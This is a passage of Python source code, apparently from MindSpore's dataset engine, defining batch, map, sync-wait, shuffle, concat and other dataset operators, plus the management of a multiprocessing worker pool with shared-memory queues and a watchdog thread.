self.bucket_boundaries = replace_none(bucket_boundaries, [])
self.bucket_batch_sizes = replace_none(bucket_batch_sizes, [])
self.element_length_function = element_length_function
self.pad_info = replace_none(pad_info, {})
self.pad_to_bucket_boundary = replace_none(pad_to_bucket_boundary, False)
self.drop_remainder = replace_none(drop_remainder, False)
def parse(self, children=None):
return cde.BucketBatchByLengthNode(children[0], self.column_names, self.bucket_boundaries,
self.bucket_batch_sizes, self.element_length_function, self.pad_info,
self.pad_to_bucket_boundary, self.drop_remainder)
def _check_shm_usage(num_worker, queue_size, max_rowsize, num_queues=1):
"""
Check sufficient shared memory is available for shared memory queues
when training in parallel mode.
"""
threshold_ratio = 0.8
if platform.system().lower() not in {"windows", "darwin"}:
device_num = _get_device_num()
# In the cluster, _get_device_num indicates the number of the entire cluster. The maximum number of cards
# on the ascend server is 8.
if device_num > 1 and context.get_context("device_target") == "Ascend":
device_num = min(device_num, 8)
shm_estimate_usage = device_num * num_worker * num_queues * \
(queue_size + 2) * max_rowsize * 1024 * 1024
try:
shm_available = psutil.disk_usage('/dev/shm').free
if shm_estimate_usage >= threshold_ratio * shm_available:
raise RuntimeError(
"Insufficient shared memory available. Required: {}, Available: {}. "
"The required memory can't exceed 80% of the available shared memory, "
"it's recommended to reduce memory usage by following methods:\n"
"1. reduce value of parameter max_rowsize or num_parallel_workers.\n"
"2. reduce prefetch size by set_prefetch_size().\n"
"3. disable shared memory by set_enable_shared_mem()."
.format(shm_estimate_usage, shm_available))
except FileNotFoundError:
raise RuntimeError("Expected /dev/shm to exist.")
class BatchDataset(UnionBaseDataset):
"""
The result of applying Batch operator to the input dataset.
Args:
input_dataset (Dataset): Input Dataset to be batched.
batch_size (Union[int, function]): The number of rows each batch is created with. An
int or callable which takes exactly 1 parameter, BatchInfo.
drop_remainder (bool, optional): Determines whether or not to drop the last
possibly incomplete batch (default=False). If True, and if there are less
than batch_size rows available to make the last batch, then those rows will
be dropped and not propagated to the child node.
num_parallel_workers (int, optional): Number of workers to process the dataset in parallel (default=None).
per_batch_map (callable, optional): Per batch map callable. A callable which takes
(list[Tensor], list[Tensor], ..., BatchInfo) as input parameters. Each list[Tensor] represents a batch of
Tensors on a given column. The number of lists should match with number of entries in input_columns. The
last parameter of the callable must always be a BatchInfo object.
input_columns (Union[str, list[str]], optional): List of names of the input columns. The size of the list must
match with signature of per_batch_map callable.
output_columns (Union[str, list[str]], optional): List of names assigned to the columns outputted by
the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (Union[str, list[str]], optional): Specifies the list of all the columns you need in the whole
dataset. The parameter is required when len(input_column) != len(output_column). Caution: the list here
is not just the columns specified in parameter input_columns and output_columns.
pad_info (dict, optional): Whether to perform padding on selected columns. pad_info={"col1":([224,224],0)}
will pad column with name "col1" to a tensor of size [224,224] and fill the missing with 0.
max_rowsize(int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
"""
def __init__(self, input_dataset, batch_size, drop_remainder=False, num_parallel_workers=None, per_batch_map=None,
input_columns=None, output_columns=None, column_order=None, pad_info=None,
python_multiprocessing=False, max_rowsize=16):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers)
if BatchDataset._is_ancestor_of_repeat(input_dataset):
logger.warning("Repeat is located before batch, data from two epochs can be batched together.")
BatchDataset._update_batch_size_for_syncwait(input_dataset, batch_size)
# if batch_size is callable, set batch_size to 1 and batch_size_func to that callable function
self.batch_size = batch_size if not callable(batch_size) else 1
self.batch_size_func = None if not callable(batch_size) else batch_size
self.drop_remainder = replace_none(drop_remainder, False)
self.per_batch_map = per_batch_map
self.input_columns = to_list(input_columns)
self.output_columns = to_list(output_columns)
self.column_order = to_list(column_order)
self.pad = bool(pad_info is not None)
self.pad_info = replace_none(pad_info, dict())
self.python_multiprocessing = python_multiprocessing
self.process_pool = None
self.max_rowsize = max_rowsize
def parse(self, children=None):
return cde.BatchNode(children[0], self.batch_size, self.drop_remainder, self.pad, self.input_columns,
self.output_columns, self.column_order, self.batch_size_func, self.per_batch_map,
self.pad_info)
@staticmethod
def _is_ancestor_of_repeat(dataset):
"""
Utility function to find the case where repeat is used before batch.
Args:
dataset (Dataset): Dataset to be checked.
Returns:
bool, whether repeat is used before batch.
"""
if isinstance(dataset, RepeatDataset):
return True
flag = False
for input_dataset in dataset.children:
flag = flag | BatchDataset._is_ancestor_of_repeat(input_dataset)
return flag
@staticmethod
def _update_batch_size_for_syncwait(dataset, batch_size):
"""
Utility function to notify batch size to sync_wait.
Args:
dataset (Dataset): Dataset to be checked.
batch_size (int): batch size to notify.
"""
if isinstance(dataset, SyncWaitDataset):
dataset.update_sync_batch_size(batch_size)
for input_dataset in dataset.children:
BatchDataset._update_batch_size_for_syncwait(input_dataset, batch_size)
def __deepcopy__(self, memodict):
return self.__safe_deepcopy__(memodict, exclude=("per_batch_map", "batch_size_func", "__transfer_dataset__"))
# Iterator bootstrap will be called on iterator construction.
# A deep copy of Dataset object is created prior of iterator_bootstrap.
# This method will create per iterator process pool and bind pyfunc execution to the pool.
def iterator_bootstrap(self):
"""
Per iterator bootstrap callback.
"""
if self.python_multiprocessing:
if self.per_batch_map is None:
logger.warning("per_batch_map is None so python_multiprocessing does not work.")
return
# If user didn't specify num_parallel_workers, set it to default
if self.num_parallel_workers is None:
self.num_parallel_workers = get_num_parallel_workers()
self.process_pool = _PythonMultiprocessing(str(self), self.num_parallel_workers, [self.per_batch_map],
self.max_rowsize * self.batch_size)
# Wrap per_batch_map into _PythonCallable
self.per_batch_map = _PythonCallable(self.per_batch_map, 0, self.process_pool)
else:
if self.per_batch_map is not None:
self.per_batch_map = FuncWrapper(self.per_batch_map)
class BatchInfo(cde.CBatchInfo):
"""
Only the batch size function and per_batch_map of the batch operator can dynamically adjust parameters
based on the number of batches and epochs during training.
"""
def get_batch_num(self):
"""
Return the batch number of the current batch.
"""
return
def get_epoch_num(self):
"""
Return the epoch number of the current batch.
"""
return
class BlockReleasePair:
"""
The blocking condition class used by SyncWaitDataset.
Args:
init_release_rows (int): Number of lines to allow through the pipeline.
callback (function): The callback function that will be called when release is called (default=None).
"""
def __init__(self, init_release_rows, callback=None):
if isinstance(init_release_rows, int) and init_release_rows <= 0:
raise ValueError("release_rows need to be greater than 0.")
self.row_count = -init_release_rows
self.cv = threading.Condition()
self.callback = callback
self.default_rows = init_release_rows
self.disable = False
def __deepcopy__(self, memodict):
return self
def reset(self):
with self.cv:
self.row_count = -self.default_rows
self.cv.notify_all()
def update_batched_size(self, batch_size):
# sanity check
if isinstance(batch_size, int) and batch_size <= 0:
raise ValueError("batch_size need to be greater than 0.")
# should only use before the pipeline creates
self.row_count *= batch_size
self.default_rows *= batch_size
def block_func(self):
"""
Function for handing blocking condition.
Returns:
bool, True.
"""
with self.cv:
# if disable is true, the always evaluate to true
not_time_out = self.cv.wait_for(lambda: (self.row_count < 0 or self.disable),
timeout=get_callback_timeout())
# time_out will be False if time out occurs
if not not_time_out:
logger.warning("Timeout happened in sync_wait, maybe dataset.sync_update(condition=...) "
"is not added after dataset.create_dict_iterator(...), now disabling lock.")
self.disable = True
self.row_count += 1
return True
def release_func(self, pass_rows=None, data=None):
with self.cv:
if pass_rows is None:
pass_rows = self.default_rows
self.row_count -= pass_rows
if self.callback is not None:
self.callback(data)
self.cv.notify_all()
def disable_lock(self):
with self.cv:
self.disable = True
self.cv.notify_all()
class SyncWaitDataset(UnionBaseDataset):
"""
The result of adding a blocking condition to the input Dataset.
Args:
input_dataset (Dataset): Input dataset to apply flow control.
num_batch (int): Number of batches without blocking at the start of each epoch.
condition_name (str): Condition name that is used to toggle sending next row.
callback (function): Callback function that will be invoked when sync_update is called (default=None).
Raises:
RuntimeError: If condition name already exists.
"""
def __init__(self, input_dataset, condition_name, num_batch, callback=None):
super().__init__(children=input_dataset)
# set to the default value, waiting for the batch to update it
self._condition_name = condition_name
if isinstance(num_batch, int) and num_batch <= 0:
raise ValueError("num_batch need to be greater than 0.")
self._pair = BlockReleasePair(num_batch, callback)
if self._condition_name in self.children[0].get_sync_notifiers():
raise RuntimeError("Condition name is already in use.")
logger.info("Please remember to add dataset.sync_update(condition=%s), otherwise hanging will result. "
"If dataset.sync_update(condition=%s) has already been added, you can ignore the info.",
condition_name, condition_name)
def parse(self, children=None):
return cde.SyncWaitNode(children[0], self._condition_name, self._pair.block_func)
def get_sync_notifiers(self):
return {**self.children[0].get_sync_notifiers(), **{self._condition_name: self._pair.release_func}}
def is_sync(self):
return True
def update_sync_batch_size(self, batch_size):
if isinstance(batch_size, int) and batch_size <= 0:
raise ValueError("num_batch need to be greater than 0.")
self._pair.update_batched_size(batch_size)
def disable_sync(self):
logger.info("Disabling Sync")
self._pair.disable_lock()
@staticmethod
def _is_ancestor_of_batch(dataset):
"""
Utility function to find the case where sync_wait is used before batch.
Args:
dataset (Dataset): Dataset to be checked.
Returns:
bool, whether sync_wait is used before batch.
"""
if isinstance(dataset, BatchDataset):
return True
flag = False
for input_dataset in dataset.children:
flag = flag | SyncWaitDataset._is_ancestor_of_batch(input_dataset)
return flag
def iterator_bootstrap(self):
self._pair.reset()
class ShuffleDataset(UnionBaseDataset):
"""
The result of applying Shuffle operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be shuffled.
buffer_size (int): Size of the buffer.
Raises:
RuntimeError: If exist sync operators before shuffle.
"""
def __init__(self, input_dataset, buffer_size):
super().__init__(children=input_dataset)
self.buffer_size = buffer_size
self.reshuffle_each_epoch = True
if self.is_sync():
raise RuntimeError("No shuffle after sync operators.")
def parse(self, children=None):
return cde.ShuffleNode(children[0], self.buffer_size, self.reshuffle_each_epoch)
def is_shuffled(self):
return True
# Pyfunc collection for multiprocess pyfunc
# This global variable will only be used within subprocesses
_GLOBAL_PYFUNC_LIST = []
_ARGS_QUEUE = []
_RET_QUEUE = []
_OP_NAME = dict()
_OP_PROCESS = dict()
_LOCK = threading.Lock()
# Pyfunc worker init function
# Python multiprocessing library forbid sending lambda function through pipe.
# This init function allow us to add all Python function to a global collection and then fork afterwards.
def _pyfunc_worker_init(pyfunc_list, args_queue, ret_queue):
global _GLOBAL_PYFUNC_LIST
global _ARGS_QUEUE
global _RET_QUEUE
_GLOBAL_PYFUNC_LIST = pyfunc_list
_ARGS_QUEUE = args_queue
_RET_QUEUE = ret_queue
# Pyfunc worker execution function
# All exceptions will be raised to main processes
def _pyfunc_worker_exec(index, qid, *args):
"""
Internal function for call certain pyfunc in Python process.
"""
# Some threads in multiprocess.pool can't process sigint signal,
# and will occur hang problem, so ctrl+c will pass to parent process.
signal.signal(signal.SIGINT, signal.SIG_IGN)
if qid != -1:
# Pass arguments through the Queue instead of directly to remote process
args = _ARGS_QUEUE[qid].get()
try:
r = _GLOBAL_PYFUNC_LIST[index](*args)
except Exception:
return ExceptionHandler(where="in map(or batch) worker and execute python function")
if isinstance(r, tuple):
_RET_QUEUE[qid].put(r)
else:
_RET_QUEUE[qid].put((r,))
return [qid]
# not using shared memory for passing arguments, call function directly
result = None
try:
result = _GLOBAL_PYFUNC_LIST[index](*args)
except Exception:
result = ExceptionHandler(where="in map(or batch) worker and execute python function")
return result
# PythonCallable wrapper for multiprocess pyfunc
class _PythonCallable:
"""
Internal Python function wrapper for multiprocessing pyfunc.
"""
def __init__(self, py_callable, idx, pool=None):
# Original Python callable from user.
self.py_callable = py_callable
# Process pool created for current iterator.
self.pool = pool
# Python callable index for subprocess _GLOBAL_PYFUNC_LIST
self.idx = idx
def __call__(self, *args):
if self.pool.is_running() and check_iterator_cleanup() is False:
try:
return self.pool.execute(self.py_callable, self.idx, *args)
except multiprocessing.TimeoutError:
return self.py_callable(*args)
# Invoke original Python callable in master process in case the pool is gone.
return self.py_callable(*args)
def to_json(self):
return self.py_callable.to_json()
class _PythonMultiprocessing(cde.PythonMultiprocessingRuntime):
"""
A wrapper to multiprocessing.pool that performs cleanup and ensure proper termination of forked processes.
"""
class _ExceptHookHandler:
"""
Internal class ExceptionHandler
"""
def __init__(self):
sys.excepthook = self.__handler_exception
@staticmethod
def mp_pool_exit_preprocess():
if check_iterator_cleanup() is False:
# Set the iterator_cleanup flag to True before exiting, and wait 3s for all apply_async
# applied to the multiprocessing task to prevent multiprocessing from hang when exiting
_set_iterator_cleanup()
time.sleep(3)
def __handler_exception(self, ex_type, value, tb):
logger.critical("Uncaught exception: ", exc_info=(ex_type, value, tb))
self.mp_pool_exit_preprocess()
def __init__(self, op_name, num_parallel_workers, operations, max_row_size=16):
super(_PythonMultiprocessing, self).__init__()
self.op_name = op_name
self.num_parallel_workers = num_parallel_workers
self.operations = operations
self.max_row_size = max_row_size
self.process_pool = None
self.op_id = -1
self.arg_q_list = []
self.res_q_list = []
self.queues_map = {}
self.next_queue = 0
self.eot = None
self.watch_dog = None
self.workers = []
self.hook = None
def Launch(self, op_id=-1):
self.op_id = op_id
logger.info("Launching new Python Multiprocessing pool for Op:" + str(self.op_id))
self.create_pool()
def create_pool(self):
"""
Returns:
"""
if get_enable_shared_mem():
self.create_shared_memory()
if self.process_pool is not None:
raise Exception("Pool was already created, close it first.")
# Construct python multiprocessing pool.
# The _pyfunc_worker_init is used to pass lambda function to subprocesses.
self.process_pool = multiprocessing.Pool(processes=self.num_parallel_workers,
initializer=_pyfunc_worker_init,
initargs=(self.operations,
self.arg_q_list, self.res_q_list))
self.gather_workers_info()
self.hook = _PythonMultiprocessing._ExceptHookHandler()
# The op (Map, Batch, etc) multiprocessing will launch a watch dog thread for monitoring sub processes
self._launch_watch_dog()
atexit.register(self.hook.mp_pool_exit_preprocess)
# If Python version greater than 3.8, we need to close ThreadPool in atexit for unclean pool teardown.
if sys.version_info >= (3, 8):
atexit.register(self.process_pool.close)
def Terminate(self):
logger.info("Terminating Python Multiprocessing pool for Op:" + str(self.op_id))
self.delete_shared_memory()
self.close_pool()
self.abort_watchdog()
self.process_pool = None
def GetPIDs(self):
# obtain process IDs from multiprocessing.pool
return [w.pid for w in self.workers]
def AddNewWorkers(self, num_new_workers):
logger.info(
"Increasing num_parallel_workers of Python Multiprocessing pool for Op:" + str(self.op_id) +
", old num_workers=" + str(self.num_parallel_workers) + " new num_workers" + str(self.num_parallel_workers +
num_new_workers) + ".")
self.Terminate()
self.num_parallel_workers += num_new_workers
self.Launch(self.op_id)
def RemoveWorkers(self, num_removed_workers):
logger.info(
"Decreasing num_parallel_workers of Python Multiprocessing pool for Op:" + str(self.op_id) +
", old num_workers=" + str(self.num_parallel_workers) + " new num_workers" + str(self.num_parallel_workers -
num_removed_workers) + ".")
self.Terminate()
self.num_parallel_workers -= num_removed_workers
self.Launch(self.op_id)
def IsMPEnabled(self):
return self.process_pool is not None
def create_shared_memory(self):
_check_shm_usage(self.num_parallel_workers, 1, self.max_row_size, 2)
self.arg_q_list = []
self.res_q_list = []
self.queues_map = {}
self.next_queue = 0
for _ in range(self.num_parallel_workers):
self.arg_q_list.append(_SharedQueue(1, max_rowsize=self.max_row_size))
self.res_q_list.append(_SharedQueue(1, max_rowsize=self.max_row_size))
def delete_shared_memory(self):
"""
Call this method to delete any shared memory created for this pool.
"""
if hasattr(self, 'arg_q_list') and self.arg_q_list is not None:
arg_q_list_len = len(self.arg_q_list)
for idx in range(arg_q_list_len):
del self.arg_q_list[arg_q_list_len - idx - 1]
del self.arg_q_list
if hasattr(self, 'res_q_list') and self.res_q_list is not None:
res_q_list_len = len(self.res_q_list)
for idx in range(res_q_list_len):
del self.res_q_list[res_q_list_len - idx - 1]
del self.res_q_list
# recreate the lists for next pool creation
self.arg_q_list = []
self.res_q_list = []
def gather_workers_info(self):
"""
Collect the PIDs of the children processes.
"""
self.workers = [w for w in self.process_pool._pool] # pylint: disable=W0212
pids = self.GetPIDs()
logger.info("Op: " + str(self.op_id) + " Python multiprocessing pool workers' PIDs: " + str(pids))
def execute(self, py_callable, idx, *args):
"""
Execute
"""
if self.is_running() and check_iterator_cleanup() is False:
result, qid, ret = self._send(py_callable, idx, *args)
if ret:
return result
# todo this check might be wrong
while check_iterator_cleanup() is False:
try:
return self._receive(result, qid)
except multiprocessing.TimeoutError:
continue
except KeyboardInterrupt:
_set_iterator_cleanup()
self.close_pool()
raise Exception("Multiprocess Op worker receives KeyboardInterrupt.")
return (None,)
return None
def _send(self, py_callable, idx, *args):
"""
The map/batch operator will use multiprocessing-pool apply_async interface to execute python function
in a sub process, apply_async will release GIL temporarily. For better performance, we use shared memory
feature and pass shared queue instead of multiprocess args.
"""
ret = False
qid = None
if self.arg_q_list:
tid = threading.get_ident()
# Need to register each thread to use a different queue to send data to pool
if tid not in self.queues_map:
qid = self.next_queue
self.next_queue += 1
self.queues_map[tid] = qid
else:
qid = self.queues_map[tid]
self.arg_q_list[qid].put(args)
# This call will send the tensors along with Python callable index to the process pool.
# Block, yield GIL. Current thread will reacquire GIL once result is returned.
if self.is_running() and check_iterator_cleanup() is False:
result = self.process_pool.apply_async(_pyfunc_worker_exec, [idx, qid, []])
else:
ret = True
result = py_callable(*args)
else:
result = self.process_pool.apply_async(_pyfunc_worker_exec, [idx, -1, *args])
return result, qid, ret
def _receive(self, result, qid):
"""
The map/batch operator will use multiprocessing-pool get interface to sync output data from a sub process,
get interface will reacquire GIL. For better performance, we use shared memory feature and get data from
shared queue directly.
"""
if self.arg_q_list:
r = result.get(30)
if isinstance(r, ExceptionHandler):
r.reraise()
if r[0] != qid:
raise Exception("In PyCallable, got results from wrong thread")
r = self.res_q_list[qid].get()
return r
r = result.get(30)
if isinstance(r, ExceptionHandler):
r.reraise()
return r
# This wait function is for cleaning zombie subprocesses
@staticmethod
def wait_pid():
"""
This function is used by the main process to release subprocess resources.
"""
try:
while True:
child_pid, _ = os.waitpid(-1, os.WNOHANG)
if child_pid == 0:
break
except OSError:
# waitpid may be failed for some reasons so we ignore this error
pass
# Dataset need watch_dog thread to monitoring fork multi-processing,
# and thread can't be a member function otherwise python won't collect and release resources.
@staticmethod
def _watch_dog(eot, workers, pool=None):
"""
This thread is for monitoring subprocesses forked by GeneratorDataset/map/batch
"""
if not isinstance(workers, list):
raise TypeError("[Internal Error] The 2nd parameter of watch dog thread should be list of process, " \
"but got {}.".format(type(workers)))
if pool is not None and not isinstance(pool, multiprocessing.pool.Pool):
raise TypeError("[Internal Error] The 3rd parameter of watch dog thread should be multiprocessing.Pool, " \
"but got {}".format(type(pool)))
while not eot.is_set():
subprocess_exit_num = 0
# Monitoring and count how many subprocesses already exit
subprocess_exit_num = _PythonMultiprocessing._monitor_subprocess_exit(workers)
# If find subprocess exit, we will wait for 30s and do some waitpid operations
if subprocess_exit_num > 0:
if pool is not None:
# Python multiprocessing.pool has a bug, if sub process of pool is killed, pool will launch
# a new sub process, so we have to set worker_handler._state to TERMINATE to stop relaunching.
if pool._state == RUN: # pylint: disable=W0212
pool._state = TERMINATE # pylint: disable=W0212
pool._worker_handler._state = TERMINATE # pylint: disable=W0212
start = time.time()
while time.time() - start < 30:
# We need to distinguishing get_dataset_size or train finished normally and hang scenario.
# If get_dataset_size or train finished normally, _stop_subprocess can be execute and
# self.need_abort can be set to True. If main process is hang in get(), self.need_abort
# will never set to True, then we wait for 30s and kill main process
if eot.is_set():
return
# Sometimes subprocess may be zombie, so in 30s we can wait and do some useful tasks(waitpid).
_PythonMultiprocessing.wait_pid()
# multiprocessing.queue may hang in .get() forever when put() process was killed.
# We have to exit main process otherwise main process will hang.
if pool is not None:
_PythonMultiprocessing._terminate_process(pool._pool) # pylint: disable=W0212
else:
_PythonMultiprocessing._terminate_process(workers)
logger.critical("The subprocess of dataset may exit unexpected or be killed, "
"main process will exit.")
os.kill(os.getpid(), signal.SIGTERM)
@staticmethod
# Terminate subprocess launched by multiprocessing.pool
def _terminate_process(workers):
for w in workers:
if w.exitcode is None:
w.terminate()
for w in workers:
if w._closed is False: # pylint: disable=W0212
w.join()
# Monitor the exit number of subprocesses
@staticmethod
def _monitor_subprocess_exit(workers):
subprocess_exit_num = 0
for w in workers:
if w.exitcode is not None:
subprocess_exit_num += 1
return subprocess_exit_num
def _launch_watch_dog(self):
if platform.system().lower() != 'windows':
self.eot = threading.Event()
self.watch_dog = threading.Thread(target=self._watch_dog, args=(self.eot, self.workers, self.process_pool))
self.watch_dog.daemon = True
self.watch_dog.start()
def _abort_watchdog(self):
if not self.eot.is_set():
self.eot.set()
def abort_watchdog(self):
if hasattr(self, 'watch_dog') and self.watch_dog is not None and hasattr(self, 'eot') and self.eot is not None:
self._abort_watchdog()
def is_running(self):
# note here: the RUN state of python3.7 and python3.8 is different:
# python3.7: RUN = 0
# python3.8: RUN = "RUN"
# so we use self.pool._state == RUN instead and we can't use _state == 0 any more.
if self.process_pool is not None and self.process_pool._state == RUN: # pylint: disable=W0212
return True
return False
def close_pool(self):
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.close()
self.process_pool.join()
def __del__(self):
# Cleanup when the iter had been deleted from ITERATORS_LIST
self.Terminate()
class MapDataset(UnionBaseDataset):
"""
The result of applying the Map operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be mapped.
operations (Union[list[TensorOperation], list[functions]]): A function mapping a nested structure of tensors
to another nested structure of tensor (default=None).
input_columns (Union[str, list[str]]): List of names of the input columns
(default=None, the operations will be applied on the first columns in the dataset).
The size of the list should match the number of inputs of the first operator.
output_columns (Union[str, list[str]], optional): List of names of the output columns.
The size of the list should match the number of outputs of the last operator
(default=None, output columns will be the input columns, i.e., the columns will
be replaced).
column_order (list[str], optional): Specifies the list of all the columns you need in the whole
dataset. The parameter is required when len(input_column) != len(output_column). Caution: the list here
is not just the columns specified in parameter input_columns and output_columns.
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
python_multiprocessing (bool, optional): Parallelize Python operations with multiple worker process. This
option could be beneficial if the Python operation is computational heavy (default=False).
cache (DatasetCache, optional): Use tensor caching service to speed up dataset processing.
(default=None, which means no cache is used).
callbacks (DSCallback, list[DSCallback], optional): List of Dataset callbacks to be called (Default=None)
max_rowsize(int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
offload (bool, optional): Flag to indicate whether offload is used (Default=None).
Raises:
ValueError: If len(input_columns) != len(output_columns) and column_order is not specified.
"""
def __init__(self, input_dataset, operations=None, input_columns=None, output_columns=None, column_order=None,
num_parallel_workers=None, python_multiprocessing=False, cache=None, callbacks=None, max_rowsize=16,
offload=None):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers, cache=cache)
self.operations = to_list(operations)
self.operations = py_transforms.Compose.reduce(self.operations)
self.input_columns = to_list(input_columns)
self.output_columns = to_list(output_columns)
self.column_order = replace_none(column_order, [])
# If output_columns were not provided then use input_columns
self.output_columns = self.input_columns if not self.output_columns else self.output_columns
if self.input_columns and self.output_columns \
and len(self.input_columns) != len(self.output_columns) \
and not self.column_order:
raise ValueError("When length of input_columns and output_columns are not equal,"
" column_order must be specified.")
self.python_multiprocessing = python_multiprocessing
self.process_pool = None
self.callbacks = to_list(callbacks)
self.max_rowsize = max_rowsize
self.offload = offload
def parse(self, children=None):
operations = []
for op in self.operations:
if op and getattr(op, 'parse', None):
operations.append(op.parse())
else:
operations.append(op)
callbacks = [cb.create_runtime_obj() for cb in self.callbacks]
return cde.MapNode(children[0], operations, self.input_columns, self.output_columns, self.column_order,
callbacks, self.max_rowsize, OffloadToManualOffloadMode.get(self.offload), self.process_pool)
def __deepcopy__(self, memodict):
return self.__safe_deepcopy__(memodict, exclude=("operations", "callbacks", "__transfer_dataset__"))
# Iterator bootstrap will be called on iterator construction.
# A deep copy of Dataset object is created prior of iterator_bootstrap.
# This method will create per iterator process pool and bind pyfunc execution to the pool.
def iterator_bootstrap(self):
"""
Per iterator bootstrap callback.
"""
if self.python_multiprocessing:
iter_specific_operations = []
callable_list = []
# If user didn't specify num_parallel_workers, set it to default
if self.num_parallel_workers is None:
self.num_parallel_workers = get_num_parallel_workers()
# Pass #1, look for Python callables and build list
for op in self.operations:
# our c transforms is now callable and should not be run in Python multithreading
if MapDataset.__operation_valid_for_multiprocessing(op):
callable_list.append(op)
if callable_list:
self.process_pool = _PythonMultiprocessing(str(self), self.num_parallel_workers, callable_list,
self.max_rowsize)
# Pass #2
idx = 0
for op in self.operations:
# our c transforms is now callable and should not be run in Python multithreading
if MapDataset.__operation_valid_for_multiprocessing(op):
# Wrap Python callable into _PythonCallable
iter_specific_operations.append(_PythonCallable(op, idx, self.process_pool))
idx += 1
else:
# CPP ops remain the same
iter_specific_operations.append(op)
self.operations = iter_specific_operations
@staticmethod
def __operation_valid_for_multiprocessing(op):
if callable(op) and str(op).find("c_transform") < 0:
return True
return False
class FilterDataset(UnionBaseDataset):
"""
The result of applying filter predicate to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be mapped.
predicate (callable): Python callable which returns a boolean value. If False then filter the element.
input_columns (Union[str, list[str]], optional): List of names of the input columns
(default=None, the predicate will be applied to all columns in the dataset).
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
"""
def __init__(self, input_dataset, predicate, input_columns=None, num_parallel_workers=None):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers)
self.predicate = lambda *args: bool(predicate(*args))
self.input_columns = to_list(input_columns)
def parse(self, children=None):
return cde.FilterNode(children[0], self.predicate, self.input_columns)
class RepeatDataset(UnionBaseDataset):
"""
The result of applying Repeat operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be repeated.
count (int): Number of times the dataset will be repeated (default=-1, repeat indefinitely).
"""
def __init__(self, input_dataset, count):
super().__init__(children=input_dataset)
self.count = replace_none(count, -1)
def parse(self, children=None):
return cde.RepeatNode(children[0], self.count)
class SkipDataset(UnionBaseDataset):
"""
The result of applying Skip operator to the input Dataset.
Args:
input_dataset (Dataset): Input dataset to have elements skipped.
count (int): Number of elements to be skipped in the dataset.
"""
def __init__(self, input_dataset, count):
super().__init__(input_dataset)
self.count = count
def parse(self, children=None):
return cde.SkipNode(children[0], self.count)
class TakeDataset(UnionBaseDataset):
"""
The result of applying Take operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to have elements taken from.
count (int): Number of elements to be taken from the dataset.
"""
def __init__(self, input_dataset, count):
super().__init__(children=input_dataset)
self.count = count
def parse(self, children=None):
return cde.TakeNode(children[0], self.count)
class ZipDataset(UnionBaseDataset):
"""
The result of applying Zip operator to the input Dataset.
Args:
datasets (tuple): A tuple of datasets to be zipped together.
Raises:
TypeError: If dataset is not an instance of Dataset.
"""
def __init__(self, datasets):
super().__init__(children=datasets)
def parse(self, children=None):
return cde.ZipNode(children)
def is_sync(self):
return any([c.is_sync() for c in self.children])
class ConcatDataset(UnionBaseDataset):
"""
The result of applying concat dataset operator to the input Dataset.
Args:
datasets (list): A list of datasets to be concatenated together.
Raises:
TypeError: If dataset is not an instance of Dataset.
ValueError: If there is no samples in the one of the datasets.
"""
def __init__(self, datasets):
super().__init__(children=datasets)
for dataset in datasets:
if not isinstance(dataset, Dataset):
raise TypeError("Invalid dataset, expected Dataset object, but got %s!" % type(dataset))
self.datasets = datasets
self._sampler = samplers.SequentialSampler(num_samples=None)
self.children_sizes_ = [c.get_dataset_size() for c in self.children]
child_index = 0
for item in self.children_sizes_:
if item == 0:
raise ValueError("There are no samples in the dataset number %d. Please make sure there are "
"valid samples in the dataset." % child_index)
child_index += 1
# _children_flag_and_nums: A list of pair<int ,int>.The first element of pair is flag that characterizes
# whether the dataset is mappable. The second element of pair is length of the dataset
self._children_flag_and_nums = []
# _children_start_end_index_: A list of pair<int ,int>.The elements of pair are used to characterize
# the valid position of the dataset corresponding to the subscript when sampling
self._children_start_end_index_ = []
for index, child in enumerate(self.children):
tem_list = [-1, -1]
self._children_start_end_index_.append(tem_list)
dataset_len = self.children_sizes_[index]
from mindspore.dataset.engine.datasets_user_defined import GeneratorDataset
if isinstance(child, GeneratorDataset) and not hasattr(child.source, "__getitem__"):
dataset_len = 0
self.children_sizes_[index] = 0
if isinstance(child, MappableDataset):
self._children_flag_and_nums.append((0, dataset_len))
else:
self._children_flag_and_nums.append((1, dataset_len))
def parse(self, children=None):
return cde.ConcatNode(children, self._sampler, self._children_flag_and_nums, self._children_start_end_index_)
def use_sampler(self, sampler):
"""
Set the distributedSampler to concat dataset
Args:
sampler (Sampler): The sampler to use for the current dataset.
Currently supported: DistributedSampler.
Raises:
TypeError: If the sampler is not an instance of DistributedSampler
ValueError: If the parameter shuffle of sampler is True
ValueError: If the parameter NumSamples of sampler is not None.
ValueError: If num_shards <=0.
"""
if not isinstance(sampler, samplers.DistributedSampler):
raise TypeError("The parameter %s of concat must be DistributedSampler!" % sampler)
if sampler.is_shuffled():
raise ValueError("The parameter shuffle of DistributedSampler must be False!")
if sampler.num_shards <= 0:
raise ValueError("The parameter num_shards of DistributedSampler must be positive int!")
if sampler.get_num_samples() is not None:
raise ValueError("The parameter num_samples of DistributedSampler is not support to be set!")
self.dataset_size = None
self._sampler = sampler
cumulative_samples_nums = 0
for index, child in enumerate(self.children):
if hasattr(child, 'sampler') and child.sampler.get_num_samples() is not None:
raise ValueError("The parameter NumSamples of %s is not support to be set!" % child)
if isinstance(child, BatchDataset):
raise TypeError("The parameter %s of concat must not be BatchDataset!" % child)
# if child is mappable and the length is greater than 0
if not self._children_flag_and_nums[index][0] and self._children_flag_and_nums[index][1]:
tem_value = cumulative_samples_nums + self._children_flag_and_nums[index][1]
if not self._children_flag_and_nums[index][1] >= sampler.num_shards:
if tem_value < sampler.num_shards:
self._children_start_end_index_[index][0] = cumulative_samples_nums
